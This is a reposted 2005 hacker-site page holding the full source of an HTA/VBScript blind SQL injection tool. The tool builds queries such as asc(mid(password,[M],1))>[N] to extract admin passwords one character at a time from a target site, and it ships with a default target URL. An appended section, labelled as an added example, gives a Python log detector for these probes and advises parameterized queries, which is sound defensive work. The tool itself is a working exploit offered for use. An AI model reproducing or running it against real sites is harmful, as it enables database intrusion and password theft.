SQL Injection, Web Page (HTA) Version
Hacker Base  Views:  Date: 2005-11-5 19:38:23  Source: www.hookbase.com
<HEAD>
<TITLE> SQL Class Tools - By Sunhack</TITLE>
<HTA:APPLICATION ID="LiloHTA"
APPLICATIONNAME="Lilo"
BORDER ="dialog window"
BORDERSTYLE ="raised"
CAPTION ="yes"
ICON ="%windir%\Explorer.exe"
MAXIMIZEBUTTON ="no"
MINIMIZEBUTTON ="yes"
SHOWINTASKBAR ="YES"
SINGLEINSTANCE ="no"
SYSMENU ="yes"
VERSION ="1.0"
WINDOWSTATE ="normal">
<style>body{font-size:9pt;border:0pt}input{font-size:9pt}
.textbox {BORDER-BOTTOM: #00378A 2px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid}
.vbutton {BORDER-BOTTOM: 1px solid; BORDER-LEFT: 1px solid; BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid ;
padding-top:2pt;padding-bottom:-1pt}
</style>
<Script Language="vbScript">
<!--
Sub Main
    Const HEIGHT = 840
    Const WIDTH = 650
    window.resizeTo HEIGHT, WIDTH
    window.moveTo (screen.width - HEIGHT) / 2, (screen.height - WIDTH) / 2
End Sub
Function GetStrThis()
    If inURL.Value ="" Or inSQL.Value="" Or inStr(inURL.Value ,"http://") = 0 Or inURL.Value = "http://" Then Exit Function
    GetStrThis= inSQL.Value
    GetStrThis= Replace(GetStrThis,"[B]",inBAS.Value)
    GetStrThis= Replace(GetStrThis,"[T]",inTAB.Value)
    GetStrThis= Replace(GetStrThis,"[F]",inFIL.Value)
    GetStrThis= Replace(GetStrThis,"[M]",inNUM.Value)
    GetStrThis= Replace(GetStrThis,"[N]",inCRM.Value)
    GetStrThis= Replace(inURL.Value & " " & GetStrThis & inEND.Value," "," ")
End Function
Function GoCreak_onClick()
    GoWhere.Location.Href="about:blank"
    GoWhere.document.write "<center><font style='font-size:9pt;color:RED'>Waitting For Open New URL...</font></center>"
    GoWhere.Location.Href=GetStrThis
End Function
Function SoCreak_onClick()
    Msgbox GetStrThis , 4096 ,"显示注入URL"
End Function
Function Show_onClick()
    Msgbox String(23," ") & Chr(inCRM.Value) & String(25," ") , 0 ,"ASCII To CHAR"
End Function
Function Document_onClick()
    'Window.Focus()
End Function
Function inENDStr()
    If inEND.Value="" Then inEND.Value=" and ''='" Else inEND.Value=""
End Function
Function Document_onKeyPress()
    If Window.Event.keyCode = 13 Then Call GoCreak_onClick()
End Function
Call Main
-->
</Script>
<Script Language="JavaScript">
function vSelect()
{ var GetThis = event.srcElement; return GetThis;}
</Script>
</HEAD>
<body scroll="no" style="margin-top:10pt">
<Center>
地址:<input type="text" name="inURL" size="95" value="http://www.my-china.net/xSQL/index.asp?id=1" Class="textbox"><BR><BR>
[B]:<input type="text" name="inBAS" size="7" value="" Class="textbox">
[T]:<input type="text" name="inTAB" size="7" value="admin" Class="textbox">
[F]:<input type="text" name="inFIL" size="7" value="id" Class="textbox">
[M]:<input type="text" name="inNUM" size="7" value="1" Class="textbox"> [N]:
<input type="text" name="inCRM" size="7" Value="33" Class="textbox">
<input type="button" value=" 显示ASCII " name="Show" Class="vbutton">
[W]:<input type="text" name="inEND" size="10" value="" Class="textbox"> [<font color="Red" onClick="vbScript:inENDStr" Style="Cursor:hand">*</font>]
<br><br>
<input type="text" Class="textbox" name="inSQL" size="92" value="and (select top 1 [F] from [T] where [F]=1 and asc(mid(password,[M],1))>[N])">
<input type="button" value=" 尝试 " name="GoCreak" Class="vbutton">
<input type="button" value=" 显示 " name="SoCreak" Class="vbutton">
<br><BR>
<iframe align=center name="GoWhere" frameborder="0" width=810 height=480 scrolling=auto src="about:blank"></iframe>
</center>
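The request template above fills [M] and [N] into a comparison of the form asc(mid(password,[M],1))>[N], so a run of such requests leaves a recognizable trail in web server logs. The following is an added detection example, not part of the original page or tool: the log layout (client, method, URI, status), the sample lines, the path /app/item.asp and the function names are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Matches the comparison produced once [M]/[N] are filled in,
# e.g. asc(mid(password,1,1))>33 ; tolerant of case and whitespace.
PROBE = re.compile(
    r"\basc\s*\(\s*mid\s*\(\s*(?P<col>[\w\[\]]+)\s*,\s*(?P<pos>\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*(?P<op>[<>=]{1,2})\s*(?P<val>\d+)", re.I)

# Constructed sample log (assumed layout: client method uri status).
SAMPLE_LOG = [
    "192.0.2.10 GET /app/item.asp?id=1 200",
    "198.51.100.7 GET /app/item.asp?id=1+and+(select+top+1+id+from+admin"
    "+where+id=1+and+asc(mid(password,1,1))>33) 200",
    "198.51.100.7 GET /app/item.asp?id=1%20and%20(select%20top%201%20id%20from%20admin"
    "%20where%20id=1%20and%20ASC(MID(password,1,1))%3E80) 500",
    "198.51.100.7 GET /app/item.asp?id=1+and+(select+top+1+id+from+admin"
    "+where+id=1+and+asc(mid(password,2,1))>64) 200",
    "192.0.2.10 GET /search.asp?q=mid+century+desk 200",
]

def parse_line(line):
    """Return (client, uri) from one log line, or None if the layout differs."""
    parts = line.split()
    if len(parts) != 4:
        return None
    return parts[0], parts[2]

def find_blind_sqli(lines, min_probes=3):
    """Return {(client, path): sorted [(position, threshold), ...]} for clients
    that sent at least min_probes distinct character-comparison probes to a path."""
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, uri = parsed
        url = urlsplit(uri)
        # Decode twice so both single- and double-encoded payloads are normalized.
        query = unquote_plus(unquote_plus(url.query))
        m = PROBE.search(query)
        if m:
            seen[(client, url.path)].add((int(m["pos"]), int(m["val"])))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_probes}

if __name__ == "__main__":
    for (client, path), probes in find_blind_sqli(SAMPLE_LOG).items():
        print(f"{client} probed {path}: {probes}")
```

A hit means the parameter is being tested character by character. The lasting fix is on the server side: bind the id value as a typed parameter instead of concatenating it into the SQL string.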